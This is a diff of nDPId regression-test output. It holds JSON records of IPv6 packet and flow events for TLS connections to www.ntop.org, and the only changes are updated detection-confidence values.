00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="} @@ -54,9 +54,9 @@ 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="} 